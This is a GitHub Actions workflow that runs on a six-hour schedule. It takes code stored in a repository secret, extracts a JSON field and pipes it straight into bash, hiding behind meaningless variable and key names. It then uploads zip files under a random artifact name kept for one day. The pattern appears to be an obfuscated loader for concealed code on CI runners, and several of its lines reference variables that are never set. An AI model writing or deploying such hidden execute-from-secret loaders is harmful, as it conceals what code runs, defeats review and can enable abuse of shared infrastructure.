name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '1 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Start
        env:
          ajno8: ${{ secrets.ajno8 }}
        run: |
          printf '%s' "$ajno8" | jq -r .hunn8156 | /bin/bash
          printf '%s' "$hox92823" | jq -r .yosdr16 | /bin/bash
          printf '%s' "$l977" | jq -r .yloan3 | /bin/bash
          echo $gqh8799 | jq -r .vo6 | /bin/bash
          echo $ik0 | jq -r .uuq07298 | /bin/bash
          printf '%s' "$a565" | jq -r .rvoda325 | /bin/bash
          printf '%s' "$mmir3" | jq -r .cxoyu32472 | /bin/bash
          printf '%s' "$u73" | jq -r .kpkla08 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: XojxNVBe
          path: "*.zip"
          retention-days: 1
